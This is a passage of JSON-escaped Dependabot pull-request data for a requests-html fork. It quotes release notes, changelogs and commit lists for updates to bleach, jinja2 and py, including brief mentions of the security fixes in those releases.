href=\"https://github.com/mozilla/bleach/commit/612b8080ada0fba45f0575bfcd4f3a0bda7bfaca\"\u003e\u003ccode\u003e612b808\u003c/code\u003e\u003c/a\u003e Update for v3.2.3 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/6879f6a67058c0d5977a8aa580b6338c9d34ff0e\"\u003e\u003ccode\u003e6879f6a\u003c/code\u003e\u003c/a\u003e html5lib_shim: validate unicode points for convert_entity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/90cb80be961aaf650ebc65b2ba2b789a2e9b129f\"\u003e\u003ccode\u003e90cb80b\u003c/code\u003e\u003c/a\u003e Update for v3.2.2 release\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v3.1.5...v3.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.11.2 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.11.2...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.8.1 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG...\n\n_Description has been truncated_","html_url":"https://github.com/sumonst21/requests-html/pull/6","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/sumonst21%2Frequests-html/issues/6","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/6/packages"}],"issue_packages":[{"old_version":"1.8.0","new_version":"1.11.0","update_type":"minor","path":"the pip group across 1 directory","pr_created_at":"2025-09-30T03:57:25.000Z","version_change":"1.8.0 → 1.11.0","issue":{"uuid":"2872784603","node_id":"PR_kwDODhwVbM6rOzbb","number":1,"state":"open","title":"Bump py from 1.8.0 to 1.11.0 in the pip group across 1 directory","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-09-30T03:57:25.000Z","updated_at":"2025-09-30T03:57:25.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"py","old_version":"1.8.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"}],"path":"the pip group across 1 directory","ecosystem":"pip"},"body":"Bumps the pip group with 1 update in the / directory: [py](https://github.com/pytest-dev/py).\n\nUpdates `py` from 1.8.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.8.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility 